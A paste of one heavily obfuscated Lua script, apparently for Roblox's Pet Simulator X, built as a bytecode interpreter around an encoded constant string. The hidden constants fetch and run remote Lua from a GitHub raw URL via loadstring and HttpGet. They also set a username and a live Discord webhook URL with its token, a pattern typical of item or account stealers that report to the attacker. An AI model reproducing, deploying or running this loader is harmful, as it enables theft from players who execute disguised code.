

Feb 25th, 2023 (edited)
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  12. do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v74=v2(v0(v20,16));if v19 then local v79=0;local v80;while true do if (v79==0) then v80=v5(v74,v19);v19=nil;v79=1;end if (v79==1) then return v80;end end else return v74;end end end);local function v21(v22,v23,v24)if v24 then local v75=0;local v76;while true do if (v75==(1835 -(458 + 1377))) then v76=(v22/((1474 -(698 + 774))^(v23-(1918 -(589 + (5219 -3891))))))%(2^(((v24-(1 + 0)) -(v23-(2 -1))) + (246 -(84 + (1944 -(1127 + 656)))))) ;return v76-(v76%(732 -(269 + 462))) ;end end else local v77=612 -(120 + 492) ;local v78;while true do if (v77==(0 -0)) then v78=((2462 -(355 + 162)) -((3608 -(445 + 1350)) + 130))^(v23-((2968 -(435 + 1092)) -(22 + 265 + 1153))) ;return (((v22%(v78 + v78))>=v78) and 1) or (0 + (1888 -(1283 + 605))) ;end end end end local function v25()local v38=v1(v16,v18,v18);v18=v18 + 1 ;return v38;end local function v26()local v39=(3597 -2347) -(825 + 425) ;local v40;local v41;while true do if (v39==(0 -0)) then v40,v41=v1(v16,v18,v18 + 2 );v18=v18 + 1 + 1 ;v39=1 + 0 ;end if (v39==(1161 -(207 + (2428 -1475)))) then return (v41 * (627 -(253 + 118))) + v40 ;end end end local function v27()local v42,v43,v44,v45=v1(v16,v18,v18 + (740 -(9 + 728)) );v18=v18 + 3 + (3 -2) ;return (v45 * (35649128 -18871912)) + (v44 * (255562 -190026)) + (v43 * (1697 -((822 -(545 + 67)) + 1231))) + v42 ;end local function v28()local v46=0 + 0 ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==3) then if (v51==(1026 -(380 + 646))) then if (v50==(0 -0)) then return v52 * 0 ;else v51=1;v49=0 -0 ;end elseif (v51==(561 + (3032 -(1232 + 314)))) then return ((v50==(1028 -(829 + 199))) and (v52 * (1/(0 -0)))) or (v52 * NaN) ;end return v8(v52,v51-(3591 -(8085 -5517)) ) * (v49 + (v50/(((2 + 2) -2)^(103 -51)))) ;end if (v46==((11 -6) -(2 + 1))) then v51=v21(v48,96 -75 ,31);v52=((v21(v48,117 -85 )==(1 + 0 + 0)) and  -(2 -1)) or (1 + 0) ;v46=7 -4 ;end if (v46==0) then v47=v27();v48=v27();v46=856 -(612 + 1 + 242) ;end if (v46==(1 -0)) then v49=2 -1 ;v50=(v21(v48,1433 -(774 + 43 + 615) ,18 + 2 ) * ((5 -3)^(32 + 0))) + v47 ;v46=1263 -(468 + (1586 -(529 + 264))) ;end end end local function v29(v30)local v53;if  not v30 then v30=v27();if (v30==0) then return "";end end v53=v3(v16,v18,(v18 + v30) -(1 + 0) );v18=v18 + v30 ;local v54={};for v66=1 + 0 , #v53 do v54[v66]=v2(v1(v3(v53,v66,v66)));end return v6(v54);end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v55=0 + 0 ;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v55==(2 -0)) then v60=nil;v61=nil;v55=3;end if (v55==(302 -(51 + 248))) then v62=nil;while true do if (v56~=0) then else v57={};v58={};v59={};v60={v57,v58,nil,v59};v56=2 -1 ;end if (v56~=1) then else local v91=0 + 0 ;while true do if (v91~=0) then else v61=v27();v62={};v91=1248 -(476 + 771) ;end if (v91==(2 + 0)) then v56=6 -4 ;break;end if (1==v91) then for v102=1,v61 do local v103=263 -(174 + 89) ;local v104;local v105;local v106;local v107;while true do if (v103~=(1009 -(687 + 320))) then else while true do if (v104==(1 + 0)) then v107=nil;while true do if (v105~=(0 -0)) then else local v132=0 -0 ;while true do if (v132~=(0 + 0)) then else local v157=0 -0 ;local v158;while true do if (v157==(0 -0)) then v158=0 + 0 ;while true do if (v158==(53 -(41 + 11))) then v132=1 + 0 ;break;end if ((1071 -(639 + 432))==v158) then local v178=10 -(8 + 2) ;while true do if (v178==(553 -(261 + 291))) then v158=1 + 0 ;break;end if ((0 -0)~=v178) then else v106=v25();v107=nil;v178=1 + 0 ;end end end end break;end end end if (v132~=1) then else v105=1;break;end end end if (v105==(1 + 0)) then if (v106==1) then v107=v25()~=(0 + 0) ;elseif (v106==(1101 -(716 + 383))) then v107=v28();elseif (v106~=3) then else v107=v29();end v62[v102]=v107;break;end end break;end if ((51 -(5 + 46))==v104) then local v118=0;while true do if (v118~=(0 + 0)) then else local v134=0;while true do if (v134~=(0 + 0)) then else v105=0 + 0 ;v106=nil;v134=1;end if (v134~=(213 -(136 + 76))) then else v118=1 + 0 ;break;end end end if (v118==1) then v104=2 -1 ;break;end end end end break;end if (v103~=(613 -(66 + 546))) then else v106=nil;v107=nil;v103=4 -2 ;end if (v103~=(0 -0)) then else v104=0 + 0 ;v105=nil;v103=2 -1 ;end end end v60[3]=v25();v91=2 -0 ;end end end if (v56==2) then local v92=0 -0 ;while true do if ((0 -0)==v92) then for v108=1 + 0 ,v27() do local v109=390 -(349 + 41) ;local v110;local v111;while true do if (v109~=(1 + 0)) then else while true do if (v110==(1884 -(1585 + 299))) then v111=v25();if (v21(v111,3 -2 ,1)~=0) then else local v119=0 -0 ;local v120;local v121;local v122;local v123;local v124;while true do if (v119~=(27 -(8 + 17))) then else v124=nil;while true do if (v120==(0 + 0)) then local v161=0 -0 ;local v162;while true do if (v161==(0 + 0)) then v162=0 + 0 ;while true do if (v162==(0 -0)) then local v186=0;while true do if (v186==(1 + 0)) then v162=4 -3 ;break;end if (v186~=0) then else v121=0 -0 ;v122=nil;v186=1 -0 ;end end end if (v162==(1 -0)) then v120=4 -3 ;break;end end break;end end end if (v120~=(988 -(626 + 361))) then else v123=nil;v124=nil;v120=2;end if (v120==(4 -2)) then while true do if (1~=v121) then else local v170=781 -(271 + 510) ;local v171;while true do if (v170==0) then v171=1091 -(408 + 683) ;while true do if (v171==(1 + 0)) then v121=2;break;end if (v171~=(0 + 0)) then else v124={v26(),v26(),nil,nil};if (v122==(0 + 0)) then local v192=1787 -(89 + 1698) ;local v193;local v194;while true do if (v192==(0 + 0)) then local v202=0;while true do if (v202~=(0 -0)) then else v193=0 -0 ;v194=nil;v202=1;end if (v202~=(3 -2)) then else v192=1;break;end end end if (1~=v192) then else while true do if (v193==0) then v194=373 -(8 + 365) ;while true do if (v194~=(1026 -(140 + 886))) then else v124[3 + 0 ]=v26();v124[257 -(4 + 249) ]=v26();break;end end break;end end break;end end elseif (v122==(1 + 0)) then v124[3]=v27();elseif (v122==(2 + 0)) then v124[3 + 0 ]=v27() -((1 + 1)^16) ;elseif (v122==3) then local v205=235 -(122 + 113) ;local v206;local v207;while true do if (v205~=(821 -(428 + 392))) then else while true do if (0==v206) then v207=0;while true do if (v207==(1317 -(463 + 854))) then v124[2 + 1 ]=v27() -(2^(46 -30)) ;v124[7 -3 ]=v26();break;end end break;end end break;end if ((0 -0)~=v205) then else v206=0 + 0 ;v207=nil;v205=1 -0 ;end end end v171=1;end end break;end end end if (v121~=(0 + 0)) then else local v172=305 -(6 + 299) ;local v173;while true do if (v172~=0) then else v173=429 -(59 + 370) ;while true do if (v173~=0) then else local v188=658 -(364 + 294) ;local v189;while true do if (v188==(0 + 0)) then v189=0;while true do if (v189==1) then v173=2 -1 ;break;end if (v189~=0) then else local v204=627 -(538 + 89) ;while true do if (v204==(0 -0)) then v122=v21(v111,1 + 1 ,385 -(77 + 305) );v123=v21(v111,1527 -(187 + 1336) ,6);v204=1;end if (v204==(1 + 0)) then v189=1 + 0 ;break;end end end end break;end end end if (v173~=(405 -(15 + 389))) then else v121=1 + 0 ;break;end end break;end end end if (v121==2) then local v174=0 -0 ;while true do if (v174~=(0 -0)) then else local v187=560 -(83 + 477) ;while true do if ((1501 -(724 + 777))==v187) then if (v21(v123,573 -(63 + 509) ,2 -1 )~=(889 -(216 + 672))) then else v124[1 + 1 ]=v62[v124[662 -(528 + 132) ]];end if (v21(v123,2 + 0 ,2)==(4 -3)) then v124[5 -2 ]=v62[v124[3]];end v187=1 + 0 ;end if (v187==(562 -(394 + 167))) then v174=845 -(719 + 125) ;break;end end end if (v174==1) then v121=3 -0 ;break;end end end if (v121==(4 -1)) then if (v21(v123,7 -4 ,976 -(929 + 44) )~=(2 -1)) then else v124[934 -(369 + 561) ]=v62[v124[10 -6 ]];end v57[v108]=v124;break;end end break;end end break;end if (v119==(1 + 0)) then v122=nil;v123=nil;v119=2;end if ((1678 -(702 + 976))==v119) then v120=0 + 0 ;v121=nil;v119=1676 -(1669 + 6) ;end end end break;end end break;end if ((0 -0)~=v109) then else v110=0;v111=nil;v109=1 -0 ;end end end for v112=1,v27() do v58[v112-(4 -3) ]=v33();end v92=2 -1 ;end if (v92==(1 -0)) then for v114=1 + 0 ,v27() do v59[v114]=v27();end return v60;end end end end break;end if (v55~=(1691 -(1332 + 358))) then else v58=nil;v59=nil;v55=2;end if (v55~=(0 -0)) then else v56=1225 -(95 + 1130) ;v57=nil;v55=1;end end end local function v34(v35,v36,v37)local v63=v35[1];local v64=v35[2];local v65=v35[3];return function(...)local v68=0;local v69;local v70;local v71;local v72;local v73;while true do if (v68==2) then v73=nil;v73=function()local v81=v63;local v82=v64;local v83=v65;local v84=v32;local v85={};local v86={};local v87={};for v93=0 + 0 ,v72 do if (((706 + 2226)==(4090 -(178 + 980))) and (v93>=v83)) then v85[v93-v83 ]=v71[v93 + 1 ];else v87[v93]=v71[v93 + ((2252 -(84 + 1278)) -(69 + 820)) ];end end local v88=(v72-v83) + ((6 -3) -2) ;local v89;local v90;while true do local v94=0 + 0 ;local v95;while true do if ((v94==(0 -0)) or ((1290 + 1738)>(4662 -(499 + 172)))) then v95=849 -((767 -144) + 226) ;while true do if ((v95==((755 -(246 + 509)) + 0)) or ((6635 -(1150 + 716))==(4217 -2554))) then local v116=0 + 0 ;local v117;while true do if (((12844 -9920)==((2984 + 3667) -3727)) and ((0 + 0)==v116)) then v117=374 -(96 + 278) ;while true do if ((v117==(1 + 0)) or ((2242 -((1160 -602) + 479))<(1236 -866))) then v95=1 -(0 + 0) ;break;end if (((0 -0)==v117) or ((2775 + 1249)>=(4679 -(33 + 593)))) then local v125=931 -(888 + 43) ;while true do if ((1021==(602 + 419)) and (v125==(3 -2))) then v117=1;break;end if (((2127 + 1644)>=(282 + 626)) and ((1484 -(279 + 1205))==v125)) then v89=v81[v69];v90=v89[1606 -(708 + 897) ];v125=4 -3 ;end end end end break;end end end if ((v95==(4 -3)) or ((199 + 1322 + 2039)==(11927 -7126))) then if (((2166 -(2937 -2172))<=(2479 -(185 + 24 + 30))) and (v90<=(3 + 2))) then if ((v90<=(1471 -(629 + 840))) or ((10783 -8011)<=(1155 -(147 + 264)))) then if ((v90<=(0 -0)) or ((10496 -6802)<=(631 + 132 + (3970 -(1594 + 203))))) then v87[v89[1 + 1 ]][v89[2 + 1 ]]=v89[391 -(180 + 207) ];elseif ((v90>(1 + 0)) or ((704 + 3132)>=(7832 -3395))) then if (((3060 -(250 + 1016))==(3769 -(1635 + 340))) and (v87[v89[2 -0 ]]==v89[8 -4 ])) then v69=v69 + (3 -2) ;else v69=v89[1 + 2 + 0 ];end else local v135=500 -(402 + 98) ;local v136;local v137;local v138;local v139;while true do if (((5276 -(277 + 137))>(21661 -16878)) and (v135==(1 + 0))) then v138=nil;v139=nil;v135=524 -(503 + 19) ;end if ((v135==(7 -5)) or (1927>=2084)) then while true do if (((1 -0)==v136) or ((9254 -5062)<(8572 -4969))) then v139=nil;while true do if ((v137==(2 -1)) or ((1301 -829)<(1075 -(78 + 781)))) then v87[v138 + (1125 -(929 + 195)) ]=v139;v87[v138]=v139[v89[(9 -5) + (1988 -(747 + 1241)) ]];break;end if ((v137==(0 -(0 + 0))) or ((3660 -(776 + 59))>=(5782 -(1327 + (591 -398))))) then local v184=0 -0 ;local v185;while true do if ((v184==(1991 -(998 + 504 + 489))) or ((1305 + 1637)==(5595 -2326))) then v185=1626 -(773 + 853) ;while true do if ((v185==(1 + 0)) or ((6002 -(1297 + 448))<((761 -(582 + 161)) + 67))) then v137=1 + 0 ;break;end if (((3554 -(1600 + 117))<(5927 -((446 -301) + 1491))) and (v185==(0 + 0))) then v138=v89[2 -0 ];v139=v87[v89[11 -(26 -18) ]];v185=1 + (1792 -(1722 + 70)) ;end end break;end end end end break;end if (((604 + 711)<=(5172 -2275)) and (v136==(1929 -(436 + 1493)))) then local v168=348 -(53 + 295) ;while true do if ((v168==(0 -0)) or ((2244 + 1312)<(1070 -844))) then v137=590 -(171 + 419) ;v138=nil;v168=1 + 0 ;end if ((v168==(3 -2)) or (((11142 -(902 + 853)) -4906)<(1044 + 105))) then v136=(5089 -3373) -(1276 + 439) ;break;end end end end break;end if (((1807 -(995 + 812))==v135) or ((50 + 1760)<=453)) then v136=0 + 0 + 0 ;v137=nil;v135=1 + 0 ;end end end elseif ((1214<(8695 -6952)) and (v90<=(2 + 1))) then if ((v89[502 -(104 + 396) ]==v87[v89[343 -((1587 -(52 + 1245)) + 49) ]]) or ((3302 -2079)>=(2598 + 330))) then v69=v69 + 1 + 0 ;else v69=v89[8 -5 ];end elseif ((v90>((47 -31) -(3 + 9))) or ((645 + (1690 -638))==(1618 -912))) then v87[v89[2 + 0 ]]=v89[3 -0 ];else for v155=v89[1 + 1 ],v89[3 + (0 -0) ] do v87[v155]=nil;end end elseif (((5591 -(1421 + 476))<(3595 + 1201)) and (v90<=(8 + 0))) then if ((v90<=(3 + 3)) or ((679 + 2901)<=(1768 + 560))) then local v128=422 -(350 + 72) ;local v129;local v130;local v131;while true do if ((v128==(1 + 0)) or (((1062 + 4824) -((1800 -1042) + 1158))<(2861 + 407))) then v131=nil;while true do if (((1021 -(754 + 267))==v129) or (((17949 -7388) -7731)<=(3207 -(403 + 1387)))) then local v163=820 -(141 + 679) ;while true do if ((v163==(1 + 0)) or ((1125 + (3505 -1574))<=(4817 -(874 + 1063)))) then v129=1 + 0 ;break;end if ((v163==(0 + 0)) or ((4208 -(1629 + 188 + 51))==((4236 -(12 + 14)) -(173 + 132)))) then v130=0 + 0 ;v131=nil;v163=1 + 0 ;end end end if (((3960 -(1294 + 157))>=(805 + 88)) and ((1182 -(784 + (836 -439)))==v129)) then while true do if (((2136 + 1045)>(928 + 494)) and (v130==(0 + 0))) then v131=v89[2 + 0 ];v87[v131]=v87[v131](v13(v87,v131 + (1525 -(396 + 1128)) ,v70));break;end end break;end end break;end if ((v128==(1597 -(971 + 626))) or ((4493 -2389)>=(3128 + 1222))) then v129=0;v130=nil;v128=500 -(474 + 25) ;end end elseif (((4483 -(27 + 70))>(5225 -2627)) and (v90>(329 -(276 + 46)))) then v87[v89[1998 -((1883 -(43 + 170)) + 326) ]]();else local v143=1699 -(823 + 876) ;local v144;local v145;local v146;local v147;while true do if (((5187 -(653 + 1157))>=(321 + 803)) and ((1 + 0)==v143)) then v70=(v146 + v144) -(1 + 0) ;v147=0 -0 ;v143=3 -1 ;end if (((867 + 3565)>=(2383 + 1050)) and (v143==(1376 -(959 + 415)))) then for v164=v144,v70 do local v165=0 -0 ;local v166;local v167;while true do if (((2648 -(858 + 464))<=(1286 + 1263)) and (v165==(1 + 0))) then while true do if (((5006 -(586 + 786))>(3907 -2549)) and ((0 + 0)==v166)) then v167=0 -0 ;while true do if ((v167==(0 -(0 -0))) or (((14086 -6641) -3803)<=(5094 -2445))) then v147=v147 + 1 + 0 ;v87[v164]=v145[v147];break;end end break;end end break;end if (((0 -0)==v165) or ((278 -144)>(5280 -2940))) then v166=1040 -(425 + 448 + 167) ;v167=nil;v165=(2 -1) + 0 ;end end end break;end if (((14711 -10707)>=(2584 -(373 + (1359 -(972 + 117))))) and (v143==0)) then local v160=1924 -(1164 + 232 + 528) ;while true do if (((8676 -3857)>=(3905 -(130 + 327))) and (v160==(1604 -(740 + 863)))) then v143=714 -(15 + 698) ;break;end if ((v160==(577 -(333 + 244))) or ((3082 -2241)>(4264 -(430 + 297 + 927)))) then v144=v89[2 + 0 ];v145,v146=v84(v87[v144](v13(v87,v144 + 1 + 0 ,v89[843 -(93 + 747) ])));v160=1 + 0 ;end end end end end elseif ((v90<=(49 -39)) or ((4039 -(3009 -(312 + 1493)))>=((9306 -(364 + 16)) -5678))) then if ((v90>(2 + 7)) or ((4088 + 561)<(2451 -(126 + 471)))) then v69=v89[9 -(24 -18) ];else v37[v89[1589 -(521 + 1065) ]]=v87[v89[(1005 + 807) -(439 + 1371) ]];end elseif ((v90==(663 -(488 + 164))) or (((9538 -6233) -1345)>(709 + 1717))) then do return;end else v87[v89[235 -(113 + 120) ]]=v37[v89[2 + 1 ]];end v69=v69 + 1 + 0 ;break;end end break;end end end end;v68=3;end if (v68==3) then A,B=v32(v11(v73));if  not A[1] then local v96=v35[4][v69] or "?" ;error("Script error at ["   .. v96   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v68==0) then v69=1;v70= -1;v68=1;end if (1==v68) then v71={...};v72=v12("#",...) -1 ;v68=2;end end end;end return v34(v33(),{},v17)(...);end v15("LOL!173O00028O00026O00084003023O005F4703053O00546578743403133O005374617274696E6720536372697074733O2E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A757374616E6F74686572646D652F70657473696D782O322F6D61696E2F70657473696D6775692O732E6C7561026O00F03F03103O00437573746F6D5363726970744E616D6503023O00563403053O00546578743103103O00536372697074204C6F616465643O2E027O004003083O00557365726E616D6503073O0062726F3263766603073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130373038302O3738333539323730323038322F6469704158776F594B414C79307967686265516935386B51314D663456306E7742556D6E636F333552796C3552325859537742573433666473326775363357363755355A03053O00546578743203123O0057616974696E6720666F722053637269707403053O00546578743303133O00436865636B696E6720536372697074733O2E00423O0012053O00014O0004000100013O0026023O00020001000100040A3O00020001001205000100013O002602000100110001000200040A3O0011000100120C000200033O00302O00020004000500120C000200063O00120C000300073O002001000300030008001205000500094O0007000300054O000600023O00022O000800020001000100040A3O00410001000E03000A00200001000100040A3O00200001001205000200013O0026020002001B0001000100040A3O001B000100120C000300033O00302O0003000B000C00120C000300033O00302O0003000D000E0012050002000A3O002602000200140001000A00040A3O001400010012050001000F3O00040A3O0020000100040A3O001400010026020001002F0001000100040A3O002F0001001205000200013O000E030001002A0001000200040A3O002A0001001205000300113O001209000300103O001205000300133O001209000300123O0012050002000A3O002602000200230001000A00040A3O002300010012050001000A3O00040A3O002F000100040A3O00230001002602000100050001000F00040A3O00050001001205000200013O002602000200360001000A00040A3O00360001001205000100023O00040A3O00050001002602000200320001000100040A3O0032000100120C000300033O00302O00030014001500120C000300033O00302O0003001600170012050002000A3O00040A3O0032000100040A3O0005000100040A3O0041000100040A3O000200012O000B3O00017O00423O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000D3O000D3O000E3O00103O00103O00113O00113O00123O00123O00133O00153O00153O00163O00173O00183O001B3O001B3O001C3O001E3O001E3O001F3O001F3O00203O00203O00213O00233O00233O00243O00253O00263O00293O00293O002A3O002C3O002C3O002D3O002E3O00303O00303O00313O00313O00323O00323O00333O00343O00363O00383O00393O003B3O00",v9(),...);end
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